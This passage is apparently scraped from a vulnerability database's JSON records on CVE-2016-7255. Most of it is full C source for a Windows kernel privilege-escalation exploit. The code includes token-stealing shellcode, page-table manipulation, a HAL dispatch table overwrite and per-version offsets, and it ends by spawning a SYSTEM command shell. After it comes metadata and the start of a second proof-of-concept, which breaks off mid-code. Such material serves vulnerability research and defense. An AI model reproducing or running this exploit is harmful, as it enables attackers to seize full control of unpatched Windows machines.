\nSYSTEM_MODULE_INFORMATION_ENTRY Module[1]; \n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; \n \ntypedef enum _SYSTEM_INFORMATION_CLASS { \nSystemModuleInformation = 11, \nSystemHandleInformation = 16 \n} SYSTEM_INFORMATION_CLASS; \n \ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass, \nOUT PVOID SystemInformation, \nIN ULONG SystemInformationLength, \nOUT PULONG ReturnLength); \n \ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource, \nOUT PULONG Interval); \n \nNtQuerySystemInformation_t NtQuerySystemInformation; \nNtQueryIntervalProfile_t NtQueryIntervalProfile; \n \nchar shellcode[] = { \n//0xcc, \n0xfa, // CLI \n0x9c, // PUSHFQ \n0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RAX, Original Pointer \n0x50, // PUSH RAX \n0x51, // PUSH RCX \n0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RCX, [OverwriteAddr+OverwriteOffset] \n0x48, 0x89, 0x01, // MOV QWORD PTR [RCX], RAX \n0xb9, 0x90, 0x90, 0x90, 0x90, // MOV ECX, PID \n0x53, // PUSH RBX \n \n0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, // MOV RAX,QWORD PTR gs:0x188 \n0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS \n0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00, // LEA RAX,[RAX+0xActiveProcessLinkOffset] \n//<tag> \n0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX] \n0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID \n0x48, 0x83, 0xfb, 0x04, // CMP RBX,0x4 \n0x75, 0xf3, // JNE <tag> \n0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM \n \n0x53, // PUSH RBX \n//<tag2> \n0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX] \n0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID \n0x39, 0xcb, // CMP EBX, ECX // our PID \n0x75, 0xf5, // JNE <tag2> \n0x5b, // POP RBX \n0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV QWORD PTR[RAX + 0x60], RBX \n \n0x5b, // POP RBX \n0x59, // POP RCX \n0x58, // POP RAX \n0x9d, // POPFQ \n \n0xfb, // STI \n0xff, 0xe0 // JMP RAX \n}; \n \nULONG __cdecl DbgPrint(__in char* Format, ...) \n{ \nCHAR* pszDbgBuff = NULL; \nva_list VaList = NULL; \nULONG ulRet = 0; \n \ndo \n{ \npszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR)); \nif (NULL == pszDbgBuff) \n{ \nbreak; \n} \nRtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR)); \n \nva_start(VaList, Format); \n \n_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList); \n \n \nOutputDebugStringA(pszDbgBuff); \n \nva_end(VaList); \n \n} while (FALSE); \n \nif (NULL != pszDbgBuff) \n{ \nHeapFree(GetProcessHeap(), 0, pszDbgBuff); \npszDbgBuff = NULL; \n} \n \nreturn ulRet; \n} \n \n \nint _sim_key_down(WORD wKey) \n{ \nINPUT stInput = { 0 }; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = 0; \n \nSendInput(1, &stInput, sizeof(stInput)); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_key_up(WORD wKey) \n{ \nINPUT stInput = { 0 }; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = KEYEVENTF_KEYUP; \n \nSendInput(1, &stInput, sizeof(stInput)); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_alt_shift_esc() \n{ \nint i = 0; \n \ndo \n{ \n_sim_key_down(VK_MENU); \n_sim_key_down(VK_SHIFT); \n \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_up(VK_MENU); \n_sim_key_up(VK_SHIFT); \n \n \n} while (FALSE); \n \nreturn 0; \n} \n \n \n \nint _sim_alt_shift_tab(int nCount) \n{ \nint i = 0; \nHWND hWnd = NULL; \n \n \nint nFinalRet = -1; \n \ndo \n{ \n_sim_key_down(VK_MENU); \n_sim_key_down(VK_SHIFT); \n \n \nfor (i = 0; i < nCount; i++) \n{ \n_sim_key_down(VK_TAB); \n_sim_key_up(VK_TAB); \n \nSleep(1000); \n \n} \n \n \n_sim_key_up(VK_MENU); \n_sim_key_up(VK_SHIFT); \n} while (FALSE); \n \nreturn nFinalRet; \n} \n \nint _sim_alt_esc(int count) \n{ \nint i = 0; \n \nfor (i = 0; i<count; i++) \n{ \n_sim_key_down(VK_MENU); \n//_sim_key_down(VK_SHIFT); \n \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_up(VK_MENU); \n//_sim_key_up(VK_SHIFT); \n \n} \n \nreturn 0; \n} \n \n \nint or_address_value_4(__in void* pAddress) \n{ \nWNDCLASSEXW stWC = { 0 }; \n \nHWND hWndParent = NULL; \nHWND hWndChild = NULL; \n \nWCHAR* pszClassName = L\"cve-2016-7255\"; \nWCHAR* pszTitleName = L\"cve-2016-7255\"; \n \nvoid* pId = NULL; \nMSG stMsg = { 0 }; \n \nUINT64 value = 0; \n \ndo \n{ \n \nstWC.cbSize = sizeof(stWC); \nstWC.lpfnWndProc = DefWindowProcW; \nstWC.lpszClassName = pszClassName; \n \nif (0 == RegisterClassExW(&stWC)) \n{ \nbreak; \n} \n \nhWndParent = CreateWindowExW( \n0, \npszClassName, \nNULL, \nWS_OVERLAPPEDWINDOW | WS_VISIBLE, \n0, \n0, \n360, \n360, \nNULL, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndParent) \n{ \nbreak; \n} \n \nhWndChild = CreateWindowExW( \n0, \npszClassName, \npszTitleName, \nWS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD, \n0, \n0, \n160, \n160, \nhWndParent, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndChild) \n{ \nbreak; \n} \n \n#ifdef _WIN64 \npId = ((UCHAR*)pAddress - 0x28); \n#else \npId = ((UCHAR*)pAddress - 0x14); \n#endif // #ifdef _WIN64 \n \nSetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId); \n \nDbgPrint(\"hWndChild = 0x%p\\n\", hWndChild); \n \nShowWindow(hWndParent, SW_SHOWNORMAL); \n \nSetParent(hWndChild, GetDesktopWindow()); \n \nSetForegroundWindow(hWndChild); \n \n_sim_alt_shift_tab(4); \n \nSwitchToThisWindow(hWndChild, TRUE); \n \n_sim_alt_shift_esc(); \n \nwhile (GetMessage(&stMsg, NULL, 0, 0)) { \n \nSetFocus(hWndParent); \n_sim_alt_esc(20); \nSetFocus(hWndChild); \n_sim_alt_esc(20); \n \nTranslateMessage(&stMsg); \nDispatchMessage(&stMsg); \n \nif (value != 0) { \nbreak; \n} \n \n \n__try { \nvalue = *(UINT64 *)PML4_SELF_REF; \nif ((value & 0x67) == 0x67) { \nprintf(\"Value Self Ref = %llx\\n\", value); \nbreak; \n} \n} \n__except (EXCEPTION_EXECUTE_HANDLER) { \ncontinue; \n} \n \n} \n \n \n} while (FALSE); \n \nif (NULL != hWndParent) \n{ \nDestroyWindow(hWndParent); \nhWndParent = NULL; \n} \n \nif (NULL != hWndChild) \n{ \nDestroyWindow(hWndChild); \nhWndChild = NULL; \n} \n \nUnregisterClassW(pszClassName, GetModuleHandleW(NULL)); \n \nreturn 0; \n} \n \nUINT64 get_pxe_address(UINT64 address) { \nUINT entry = PML4_SELF_REF_INDEX; \nUINT64 result = address >> 9; \nUINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39); \nUINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8; \nresult = result | lower_boundary; \nresult = result & upper_boundary; \nreturn result; \n} \n \nUINT64 look_free_entry_pml4(void) { \n// Looks for a free pml4e in the last 0x100 bytes of the PML4 \nint offset = 0xF00; \nUINT64 pml4_search = PML4_BASE + offset; \nwhile (offset < 0xFF8) \n{ \nif ((*(PVOID *)pml4_search) == 0x0) \n{ \n// This is a NULL (free) entry \nbreak; \n} \noffset += 8; \npml4_search = PML4_BASE + offset; \n} \nreturn pml4_search; \n} \n \nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) { \nUINT64 index = (spurious_offset & 0xFFF) / 8; \nUINT64 result = ( \n((UINT64)0xFFFF << 48) | \n((UINT64)PML4_SELF_REF_INDEX << 39) | \n((UINT64)PML4_SELF_REF_INDEX << 30) | \n((UINT64)PML4_SELF_REF_INDEX << 21) | \n(index << 12) \n); \nreturn result; \n} \n \n \n \nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) { \n \n/* \n1: kd> !pte ffffffff`ffd00000 \nVA ffffffffffd00000 \nPXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800 \ncontains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963 \npfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V \n*/ \n \nUINT64 pte = get_pxe_address(virtual_address); \nint pte_offset = pte & 0xFFF; \n//printf(\"PTE: %llx, %x\\n\", pte, pte_offset); \n \nUINT64 pde = get_pxe_address(pte); \nint pde_offset = pde & 0xFFF; \n//printf(\"PDE: %llx, %x\\n\", pde, pde_offset); \n \nUINT64 pdpte = get_pxe_address(pde); \nint pdpte_offset = pdpte & 0xFFF; \n//printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset); \n \nUINT64 pml4e = get_pxe_address(pdpte); \nint pml4e_offset = pml4e & 0xFFF; \n//printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset); \n \nUINT64 spurious_offset = look_free_entry_pml4(); \nprintf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset); \nUINT64 f_e_pml4 = spurious_offset; \nUINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset); \nprintf(\"[+] Spurious PT: %llx\\n\", spurious_pt); \nprintf(\"--------------------------------------------------\\n\\n\"); \n \n \n//Read the physical address of pml4e \nUINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e); \nprintf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn); \n// Change the PxE \npml4e_pfn = pml4e_pfn | 0x67; // Set U/S \n \nprintf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn; \nSleep(0x1); // Sleep for TLB refresh; \n \n//Read the physical address of pdpte \nUINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset); \nprintf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn); \n// Change the PxE \npdpte_pfn = pdpte_pfn | 0x67; // Set U/S \nprintf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn; \nSleep(0x1); // Sleep for TLB refresh; \n \n//Read the physical address of pde \nUINT64 pde_addr = spurious_pt + pde_offset; \nUINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset); \nprintf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn); \n// Change the PxE \npde_pfn = pde_pfn | 0x67; // Set U/S \nprintf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pde_pfn; \nSleep(0x1); // Sleep for TLB refresh; \n \n//Read the physical address of pte \nUINT64 pte_addr = spurious_pt + pte_offset; \nUINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset); \nprintf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn); \n// Change the PxE \npte_pfn = pte_pfn | 0x67; // Set U/S \npte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \nif (patch_original) { \nprintf(\"*** Patching the original location to enable NX...\\n\"); \n*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn; \n} \n \nprintf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pte_pfn; \nSleep(0x1); // Sleep for TLB refresh; \nprintf(\"\\n\\n\"); \nreturn spurious_pt; \n} \n \nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) { \nprintf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address); \nUINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE); \nOverwriteAddress += (target_address & 0xFFF); \nprintf(\"OverwriteAddress: %llx\\n\", OverwriteAddress); \nreturn (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset)); \n} \n \nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) { \nUINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE); \nOverwriteTarget += (target_address & 0xFFF); \nUINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset; \nprintf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address); \n*(PVOID *)target = (PVOID)hook_address; \n} \n \n \nUINT64 store_shellcode_in_hal(void) { \n//// Finally store the shellcode on the HAL \n \nUINT64 hal_heap_addr = 0xFFFFFFFFFFD00000; \nUINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE); \n \nprintf(\"HAL address: %llx\\n\", hal_heap); \n// 0xffffffffffd00d50 this is a good offset to store shellcode \n// 0xfff - 0xd50 = 0x2af space \n \nmemcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode)); \nreturn 0xffffffffffd00d50; \n} \n \nUINT64 GetHalDispatchTable() { \nPCHAR KernelImage; \nSIZE_T ReturnLength; \nHMODULE hNtDll = NULL; \nUINT64 HalDispatchTable; \nHMODULE hKernelInUserMode = NULL; \nPVOID KernelBaseAddressInKernelMode; \nNTSTATUS NtStatus = STATUS_UNSUCCESSFUL; \nPSYSTEM_MODULE_INFORMATION pSystemModuleInformation; \n \nhNtDll = LoadLibrary(\"ntdll.dll\"); \n \nif (!hNtDll) { \nprintf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nNtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\"); \n \nif (!NtQuerySystemInformation) { \nprintf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nNtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength); \n \n// Allocate the Heap chunk \npSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), \nHEAP_ZERO_MEMORY, \nReturnLength); \n \nif (!pSystemModuleInformation) { \nprintf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \nNtStatus = NtQuerySystemInformation(SystemModuleInformation, \npSystemModuleInformation, \nReturnLength, \n&ReturnLength); \n \nif (NtStatus != STATUS_SUCCESS) { \nprintf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nKernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base; \nKernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1; \n \nprintf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage); \nprintf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode); \n \nhKernelInUserMode = LoadLibraryA(KernelImage); \n \nif (!hKernelInUserMode) { \nprintf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \n// This is still in user mode \nHalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\"); \n \nif (!HalDispatchTable) { \nprintf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \nelse { \nHalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode; \n \n// Here we get the address of HapDispatchTable in Kernel mode \nHalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode); \nprintf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable); \n} \n \nHeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation); \n \nif (hNtDll) { \nFreeLibrary(hNtDll); \n} \n \nif (hKernelInUserMode) { \nFreeLibrary(hKernelInUserMode); \n} \n \nhNtDll = NULL; \nhKernelInUserMode = NULL; \npSystemModuleInformation = NULL; \n \nreturn HalDispatchTable; \n} \n \nint __cdecl main(int argc, char** argv) \n{ \nTCHAR pre_username[256]; \nTCHAR post_username[256]; \nDWORD size = 256; \nULONG Interval = 0; \nHMODULE hNtDll = NULL; \nUINT retval; \nUINT64 overwrite_address; \nint overwrite_offset; \n \n// define operating system version specific variables \nunsigned char sc_KPROCESS; \nunsigned int sc_TOKEN; \nunsigned int sc_APLINKS; \nint osversion; \n \nif (argc != 2) { \nprintf(\"Please enter an OS version\\n\"); \nprintf(\"The following OS'es are supported:\\n\"); \nprintf(\"\\t[*] 7 - Windows 7\\n\"); \nprintf(\"\\t[*] 81 - Windows 8.1\\n\"); \nprintf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\"); \nprintf(\"\\t[*] 12 - Windows 2012 R2\\n\"); \nprintf(\"\\n\"); \nprintf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\"); \nreturn -1; \n} \n \nosversion = _strtoui64(argv[1], NULL, 10); \n \nif(osversion == 7) \n{ \n// the target machine's OS is Windows 7 SP1 \nprintf(\" [+] Windows 7 SP1\\n\"); \nsc_KPROCESS = 0x70; // dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x80; // dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80) \nsc_APLINKS = 0x188; // dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = GetHalDispatchTable(); // HalDispatchTable \noverwrite_offset = 0x8; // QueryIntervalProfile \n} \nelse if(osversion == 81) \n{ \n// the target machine's OS is Windows 8.1 \nprintf(\" [+] Windows 8.1\\n\"); \nsc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60) \nsc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)) \noverwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) \n} \nelse if(osversion == 10) \n{ \n// the target machine's OS is Windows 10 prior to build 14393 \nprintf(\" [+] Windows 10\\n\"); \nsc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60) \nsc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController) \noverwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) \n} \nelse if(osversion == 12) \n{ \n// the target machine's OS is Windows 2012 R2 \nprintf(\" [+] Windows 2012 R2\\n\"); \nsc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60) \nsc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController) \noverwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) \n} \n// in case the OS version is not any of the previously checked versions \nelse \n{ \nprintf(\" [-] Unsupported version\\n\"); \nprintf(\" [*] Affected 64-bit operating systems\\n\"); \nprintf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\"); \nprintf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\"); \nprintf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\"); \nprintf(\" [*] Windows 2012 R2 -- cve-2016-7255.exe 12\\n\"); \nreturn -1; \n} \n \nprintf(\"My PID is: %d\\n\", GetCurrentProcessId()); \nGetUserName(pre_username, &size); \nprintf(\"Current Username: %s\\n\", pre_username); \nprintf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF); \nprintf(\"Shellcode stored at: %p\\n\", (void *) &shellcode); \nprintf(\"Enter to continue...\\n\"); \ngetchar(); \n \ndo \n{ \nor_address_value_4((void*)PML4_SELF_REF); \n} while (FALSE); \n \nPML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF); \nprintf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX); \nPML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000); \n \nUINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset); \n \nprintf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer); \nDWORD pid = GetCurrentProcessId(); \n \n/* Shellcode Patching !! */ \nchar *p = shellcode; \np += 4; // skip the CLI, PUSHF and MOV RAX bytes \n*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1 \n \np += 12; // Patch shellcode with original value in the Overwrite address \n*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset); \n \np += 12; // To patch the PID of our process \n \n*(DWORD *)p = (DWORD)pid; \n \np += 17; \n*(unsigned char *)p = (unsigned char)sc_KPROCESS; \n \np += 7; \n*(unsigned int *)p = (unsigned int)sc_APLINKS; \n \np += 20; \n*(unsigned int *)p = (unsigned int)sc_TOKEN; \n \np += 20; \n*(unsigned int *)p = (unsigned int)sc_TOKEN; \n \nUINT64 shellcode_va = store_shellcode_in_hal(); \nprintf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va); \noverwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset); \n \nif (osversion == 7){ \n// Exploit Win7.1 \nhNtDll = LoadLibrary(\"ntdll.dll\"); \n \nif (!hNtDll) { \nprintf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nNtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\"); \n \nif (!NtQueryIntervalProfile) { \nprintf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \nNtQueryIntervalProfile(0x1337, &Interval); \n} \n \n \nwhile (1) { \nsize = 256; \nGetUserName(post_username, &size); \nif (memcmp(post_username, pre_username, 256) != 0) break; \n} \nSleep(2000); \nsystem(\"cmd.exe\"); \n \n \nreturn 0; \n} \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/140468/ms16135-escalate.txt"}, {"lastseen": "2016-12-05T22:16:40", "description": "", "published": "2016-11-14T00:00:00", "type": "packetstorm", "title": "Microsoft Windows kernel win32k Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2016-11-14T00:00:00", "id": "PACKETSTORM:139701", "href": "https://packetstormsecurity.com/files/139701/Microsoft-Windows-kernel-win32k-Denial-Of-Service.html", "sourceData": "`/* \nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255 \n \nFull Proof of Concept: \n \nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255 \nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40745.zip \n \n******************************************************************** \nCreated: 2016-11-09 14:23:09 \nFilename: main.c \nAuthor: root[at]TinySec.net \nVersion 0.0.0.1 \nPurpose: poc of cve-2016-0075 \n********************************************************************* \n*/ \n \n#include <windows.h> \n#include <wchar.h> \n#include <stdlib.h> \n#include <stdio.h> \n \n \n////////////////////////////////////////////////////////////////////////// \n#pragma comment(lib,\"ntdll.lib\") \n#pragma comment(lib,\"user32.lib\") \n \n#undef DbgPrint \nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... ); \nULONG __cdecl DbgPrint(__in char* Format, ...) \n{ \nCHAR* pszDbgBuff = NULL; \nva_list VaList=NULL; \nULONG ulRet = 0; \n \ndo \n{ \npszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR)); \nif (NULL == pszDbgBuff) \n{ \nbreak; \n} \nRtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR)); \n \nva_start(VaList,Format); \n \n_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList); \n \nDbgPrintEx(77 , 0 , pszDbgBuff ); \nOutputDebugStringA(pszDbgBuff); \n \nva_end(VaList); \n \n} while (FALSE); \n \nif (NULL != pszDbgBuff) \n{ \nHeapFree( GetProcessHeap(), 0 , pszDbgBuff ); \npszDbgBuff = NULL; \n} \n \nreturn ulRet; \n} \n \n \nint _sim_key_down(WORD wKey) \n{ \nINPUT stInput = {0}; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = 0; \n \nSendInput(1 , &stInput , sizeof(stInput) ); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_key_up(WORD wKey) \n{ \nINPUT stInput = {0}; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = KEYEVENTF_KEYUP; \n \nSendInput(1 , &stInput , sizeof(stInput) ); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_alt_shift_esc() \n{ \nint i = 0; \n \ndo \n{ \n_sim_key_down( VK_MENU ); \n_sim_key_down( VK_SHIFT ); \n \n \n_sim_key_down( VK_ESCAPE); \n_sim_key_up( VK_ESCAPE); \n \n_sim_key_down( VK_ESCAPE); \n_sim_key_up( VK_ESCAPE); \n \n_sim_key_up( VK_MENU ); \n_sim_key_up( VK_SHIFT ); \n \n \n} while (FALSE); \n \nreturn 0; \n} \n \n \n \nint _sim_alt_shift_tab(int nCount) \n{ \nint i = 0; \nHWND hWnd = NULL; \n \n \nint nFinalRet = -1; \n \ndo \n{ \n_sim_key_down( VK_MENU ); \n_sim_key_down( VK_SHIFT ); \n \n \nfor ( i = 0; i < nCount ; i++) \n{ \n_sim_key_down( VK_TAB); \n_sim_key_up( VK_TAB); \n \nSleep(1000); \n \n} \n \n \n_sim_key_up( VK_MENU ); \n_sim_key_up( VK_SHIFT ); \n} while (FALSE); \n \nreturn nFinalRet; \n} \n \n \n \nint or_address_value_4(__in void* pAddress) \n{ \nWNDCLASSEXW stWC = {0}; \n \nHWND hWndParent = NULL; \nHWND hWndChild = NULL; \n \nWCHAR* pszClassName = L\"cve-2016-7255\"; \nWCHAR* pszTitleName = L\"cve-2016-7255\"; \n \nvoid* 